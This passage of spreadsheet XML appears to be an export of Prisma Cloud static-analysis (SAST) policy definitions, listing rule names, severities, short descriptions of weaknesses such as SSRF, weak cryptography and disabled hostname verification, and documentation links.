      <c r="Z431" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA431" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB431" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC431" t="inlineStr">
        <is>
          <t>CKV3_SAST_52</t>
        </is>
      </c>
      <c r="AD431" t="b">
        <v>1</v>
      </c>
      <c r="AE431" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF431" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>718b4130-f7e6-428f-8c55-015312ae54a4</t>
        </is>
      </c>
      <c r="AI431" t="inlineStr"/>
      <c r="AJ431" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK431" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" t="inlineStr"/>
      <c r="B432" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C432" s="2" t="inlineStr"/>
      <c r="D432" t="inlineStr"/>
      <c r="E432" t="inlineStr"/>
      <c r="F432" t="inlineStr"/>
      <c r="G432" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J432" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K432" t="inlineStr">
        <is>
          <t>Encryption keys below 2048 bit</t>
        </is>
      </c>
      <c r="L432" t="inlineStr"/>
      <c r="M432" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N432" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O432" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P432" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q432" t="inlineStr"/>
      <c r="R432" t="inlineStr"/>
      <c r="S432" t="inlineStr"/>
      <c r="T432" t="b">
        <v>0</v>
      </c>
      <c r="U432" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V432" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W432" t="inlineStr">
        <is>
          <t>Detected an insufficient key size for DSA. NIST recommends a key size of 2048 or higher.</t>
        </is>
      </c>
      <c r="X432" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-10</t>
        </is>
      </c>
      <c r="Y432" t="inlineStr"/>
      <c r="Z432" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA432" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB432" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC432" t="inlineStr">
        <is>
          <t>CKV3_SAST_10</t>
        </is>
      </c>
      <c r="AD432" t="b">
        <v>1</v>
      </c>
      <c r="AE432" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF432" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>e20e84c8-971c-4936-9ff1-8c565155056c</t>
        </is>
      </c>
      <c r="AI432" t="inlineStr"/>
      <c r="AJ432" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK432" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" t="inlineStr"/>
      <c r="B433" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C433" s="2" t="inlineStr"/>
      <c r="D433" t="inlineStr"/>
      <c r="E433" t="inlineStr"/>
      <c r="F433" t="inlineStr"/>
      <c r="G433" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J433" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K433" t="inlineStr">
        <is>
          <t>Binding to all network interfaces</t>
        </is>
      </c>
      <c r="L433" t="inlineStr"/>
      <c r="M433" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N433" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O433" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P433" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q433" t="inlineStr"/>
      <c r="R433" t="inlineStr"/>
      <c r="S433" t="inlineStr"/>
      <c r="T433" t="b">
        <v>0</v>
      </c>
      <c r="U433" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V433" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W433" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go applications bind to all network interfaces using 0.0.0.0 or [::]. Binding to all interfaces can expose services to unintended and potentially insecure traffic. It is recommended to bind to specific interfaces by passing the interface IP address through an environment variable, configuration file, or by determining the primary interface(s) IP address.</t>
        </is>
      </c>
      <c r="X433" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-262</t>
        </is>
      </c>
      <c r="Y433" t="inlineStr"/>
      <c r="Z433" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA433" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB433" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC433" t="inlineStr">
        <is>
          <t>CKV3_SAST_262</t>
        </is>
      </c>
      <c r="AD433" t="b">
        <v>1</v>
      </c>
      <c r="AE433" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF433" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>4968512c-18ad-4e5f-923d-b410f2a0bf10</t>
        </is>
      </c>
      <c r="AI433" t="inlineStr"/>
      <c r="AJ433" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK433" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" t="inlineStr"/>
      <c r="B434" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C434" s="2" t="inlineStr"/>
      <c r="D434" t="inlineStr"/>
      <c r="E434" t="inlineStr"/>
      <c r="F434" t="inlineStr"/>
      <c r="G434" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J434" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K434" t="inlineStr">
        <is>
          <t>Insecure use of crypto.pseudoRandomBytes</t>
        </is>
      </c>
      <c r="L434" t="inlineStr"/>
      <c r="M434" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N434" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O434" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P434" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q434" t="inlineStr"/>
      <c r="R434" t="inlineStr"/>
      <c r="S434" t="inlineStr"/>
      <c r="T434" t="b">
        <v>0</v>
      </c>
      <c r="U434" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V434" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W434" t="inlineStr">
        <is>
          <t>Detected usage of crypto.pseudoRandomBytes, which does not produce secure random numbers.</t>
        </is>
      </c>
      <c r="X434" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-31</t>
        </is>
      </c>
      <c r="Y434" t="inlineStr"/>
      <c r="Z434" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA434" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB434" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC434" t="inlineStr">
        <is>
          <t>CKV3_SAST_31</t>
        </is>
      </c>
      <c r="AD434" t="b">
        <v>1</v>
      </c>
      <c r="AE434" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF434" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>e7a4d98e-904f-427a-a0cf-8788dc5476d7</t>
        </is>
      </c>
      <c r="AI434" t="inlineStr"/>
      <c r="AJ434" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK434" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" t="inlineStr"/>
      <c r="B435" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C435" s="2" t="inlineStr"/>
      <c r="D435" t="inlineStr"/>
      <c r="E435" t="inlineStr"/>
      <c r="F435" t="inlineStr"/>
      <c r="G435" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J435" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K435" t="inlineStr">
        <is>
          <t>Excessive file modification permissions</t>
        </is>
      </c>
      <c r="L435" t="inlineStr"/>
      <c r="M435" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N435" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O435" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P435" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q435" t="inlineStr"/>
      <c r="R435" t="inlineStr"/>
      <c r="S435" t="inlineStr"/>
      <c r="T435" t="b">
        <v>0</v>
      </c>
      <c r="U435" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V435" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W435" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go applications set overly permissive file permissions using io/ioutil.WriteFile. Permissions greater than 0600 can expose files to unauthorized access. It is recommended to use more restrictive permissions, such as 0200 for write-only access, 0400 for read-only access, or 0600 for read/write access by the application user only.</t>
        </is>
      </c>
      <c r="X435" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-250</t>
        </is>
      </c>
      <c r="Y435" t="inlineStr"/>
      <c r="Z435" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA435" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB435" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC435" t="inlineStr">
        <is>
          <t>CKV3_SAST_250</t>
        </is>
      </c>
      <c r="AD435" t="b">
        <v>1</v>
      </c>
      <c r="AE435" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF435" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>60694397-0494-4466-a000-02f746babe09</t>
        </is>
      </c>
      <c r="AI435" t="inlineStr"/>
      <c r="AJ435" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK435" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" t="inlineStr"/>
      <c r="B436" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C436" s="2" t="inlineStr"/>
      <c r="D436" t="inlineStr"/>
      <c r="E436" t="inlineStr"/>
      <c r="F436" t="inlineStr"/>
      <c r="G436" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J436" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K436" t="inlineStr">
        <is>
          <t>User input incorporated in Java web request</t>
        </is>
      </c>
      <c r="L436" t="inlineStr"/>
      <c r="M436" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N436" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O436" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P436" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q436" t="inlineStr"/>
      <c r="R436" t="inlineStr"/>
      <c r="S436" t="inlineStr"/>
      <c r="T436" t="b">
        <v>0</v>
      </c>
      <c r="U436" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V436" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W436" t="inlineStr">
        <is>
          <t>The application exposes a potential XSS risk by returning user-supplied data.</t>
        </is>
      </c>
      <c r="X436" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-182</t>
        </is>
      </c>
      <c r="Y436" t="inlineStr"/>
      <c r="Z436" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA436" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB436" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC436" t="inlineStr">
        <is>
          <t>CKV3_SAST_182</t>
        </is>
      </c>
      <c r="AD436" t="b">
        <v>1</v>
      </c>
      <c r="AE436" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF436" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>6c2e6bfb-6661-4988-827d-47cb4b0577fe</t>
        </is>
      </c>
      <c r="AI436" t="inlineStr"/>
      <c r="AJ436" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK436" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" t="inlineStr"/>
      <c r="B437" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C437" s="2" t="inlineStr"/>
      <c r="D437" t="inlineStr"/>
      <c r="E437" t="inlineStr"/>
      <c r="F437" t="inlineStr"/>
      <c r="G437" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J437" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K437" t="inlineStr">
        <is>
          <t>Server hostnames verified during SSL/TLS connections</t>
        </is>
      </c>
      <c r="L437" t="inlineStr"/>
      <c r="M437" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N437" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O437" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P437" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q437" t="inlineStr"/>
      <c r="R437" t="inlineStr"/>
      <c r="S437" t="inlineStr"/>
      <c r="T437" t="b">
        <v>0</v>
      </c>
      <c r="U437" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V437" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W437" t="inlineStr">
        <is>
          <t>Server hostnames should be verified during SSL/TLS connections.</t>
        </is>
      </c>
      <c r="X437" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-64</t>
        </is>
      </c>
      <c r="Y437" t="inlineStr"/>
      <c r="Z437" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA437" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB437" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC437" t="inlineStr">
        <is>
          <t>CKV3_SAST_64</t>
        </is>
      </c>
      <c r="AD437" t="b">
        <v>1</v>
      </c>
      <c r="AE437" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF437" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>3ac81df0-9190-4e1d-9d20-3ca5b471ed5f</t>
        </is>
      </c>
      <c r="AI437" t="inlineStr"/>
      <c r="AJ437" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK437" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" t="inlineStr"/>
      <c r="B438" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C438" s="2" t="inlineStr"/>
      <c r="D438" t="inlineStr"/>
      <c r="E438" t="inlineStr"/>
      <c r="F438" t="inlineStr"/>
      <c r="G438" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J438" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K438" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF)</t>
        </is>
      </c>
      <c r="L438" t="inlineStr"/>
      <c r="M438" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N438" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O438" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P438" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q438" t="inlineStr"/>
      <c r="R438" t="inlineStr"/>
      <c r="S438" t="inlineStr"/>
      <c r="T438" t="b">
        <v>0</v>
      </c>
      <c r="U438" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V438" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W438" t="inlineStr">
        <is>
          <t>Server-Side-Request-Forgery (SSRF) exploits backend systems that initiate requests to third parties. If user input is used in constructing or sending these requests, an attacker could supply malicious data to force the request to other systems or modify request data to cause unwanted actions. Ensure user input is not used directly in constructing URLs or URIs when initiating requests to third party systems from back end systems.</t>
        </is>
      </c>
      <c r="X438" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-145</t>
        </is>
      </c>
      <c r="Y438" t="inlineStr"/>
      <c r="Z438" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA438" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB438" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC438" t="inlineStr">
        <is>
          <t>CKV3_SAST_145</t>
        </is>
      </c>
      <c r="AD438" t="b">
        <v>1</v>
      </c>
      <c r="AE438" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF438" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>5612303b-cb42-492d-a710-fd44b8f4856b</t>
        </is>
      </c>
      <c r="AI438" t="inlineStr"/>
      <c r="AJ438" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK438" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" t="inlineStr"/>
      <c r="B439" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C439" s="2" t="inlineStr"/>
      <c r="D439" t="inlineStr"/>
      <c r="E439" t="inlineStr"/>
      <c r="F439" t="inlineStr"/>
      <c r="G439" t="b">
        <v>1</v>
      </c>
      <c r="H4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39" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J439" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K439" t="inlineStr">
        <is>
          <t>Improper certificate validation for hostname verification</t>
        </is>
      </c>
      <c r="L439" t="inlineStr"/>
      <c r="M439" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N439" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O439" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P439" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q439" t="inlineStr"/>
      <c r="R439" t="inlineStr"/>
      <c r="S439" t="inlineStr"/>
      <c r="T439" t="b">
        <v>0</v>
      </c>
      <c r="U439" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V439" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W439" t="inlineStr">
        <is>
          <t>Either the `HostnameVerifier` has been set to always return `true` or the `X509TrustManager` has been configured to return null, or both. This effectively disables the validation of server or client certificates. It is recommended to not override the default `HostnameVerifiers`.</t>
        </is>
      </c>
      <c r="X439" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-111</t>
        </is>
      </c>
      <c r="Y439" t="inlineStr"/>
      <c r="Z439" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA439" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB439" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC439" t="inlineStr">
        <is>
          <t>CKV3_SAST_111</t>
        </is>
      </c>
      <c r="AD439" t="b">
        <v>1</v>
      </c>
      <c r="AE439" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF439" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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39" t="inlineStr">
        <is>
          <t>ff0d9327-c3c3-4eea-a01e-85ab4d0b837e</t>
        </is>
      </c>
      <c r="AI439" t="inlineStr"/>
      <c r="AJ439" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK439" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" t="inlineStr"/>
      <c r="B440" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C440" s="2" t="inlineStr"/>
      <c r="D440" t="inlineStr"/>
      <c r="E440" t="inlineStr"/>
      <c r="F440" t="inlineStr"/>
      <c r="G440" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J440" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K440" t="inlineStr">
        <is>
          <t>Incorrect access of indexable resource</t>
        </is>
      </c>
      <c r="L440" t="inlineStr"/>
      <c r="M440" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N440" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O440" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P440" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q440" t="inlineStr"/>
      <c r="R440" t="inlineStr"/>
      <c r="S440" t="inlineStr"/>
      <c r="T440" t="b">
        <v>0</v>
      </c>
      <c r="U440" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V440" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W440" t="inlineStr">
        <is>
          <t>This policy identifies incorrect access of indexable resources in Go (Golang) code, which can lead to range errors. It targets scenarios where a reference to a loop variable is taken within a for loop.</t>
        </is>
      </c>
      <c r="X440" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-261</t>
        </is>
      </c>
      <c r="Y440" t="inlineStr"/>
      <c r="Z440" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA440" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB440" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC440" t="inlineStr">
        <is>
          <t>CKV3_SAST_261</t>
        </is>
      </c>
      <c r="AD440" t="b">
        <v>1</v>
      </c>
      <c r="AE440" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF440" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>9b2cc115-2d89-43fd-a727-11e987ef928d</t>
        </is>
      </c>
      <c r="AI440" t="inlineStr"/>
      <c r="AJ440" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK440" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" t="inlineStr"/>
      <c r="B441" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C441" s="2" t="inlineStr"/>
      <c r="D441" t="inlineStr"/>
      <c r="E441" t="inlineStr"/>
      <c r="F441" t="inlineStr"/>
      <c r="G441" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J441" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K441" t="inlineStr">
        <is>
          <t>Weak cryptographic algorithm used</t>
        </is>
      </c>
      <c r="L441" t="inlineStr"/>
      <c r="M441" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N441" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O441" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P441" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q441" t="inlineStr"/>
      <c r="R441" t="inlineStr"/>
      <c r="S441" t="inlineStr"/>
      <c r="T441" t="b">
        <v>0</v>
      </c>
      <c r="U441" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V441" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W441" t="inlineStr">
        <is>
          <t>Use approved cryptographic algorithms</t>
        </is>
      </c>
      <c r="X441" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-55</t>
        </is>
      </c>
      <c r="Y441" t="inlineStr"/>
      <c r="Z441" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA441" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB441" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC441" t="inlineStr">
        <is>
          <t>CKV3_SAST_55</t>
        </is>
      </c>
      <c r="AD441" t="b">
        <v>1</v>
      </c>
      <c r="AE441" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF441" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>c55a0b90-0265-4ebe-84fe-b7fd6a808541</t>
        </is>
      </c>
      <c r="AI441" t="inlineStr"/>
      <c r="AJ441" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK441" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" t="inlineStr"/>
      <c r="B442" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
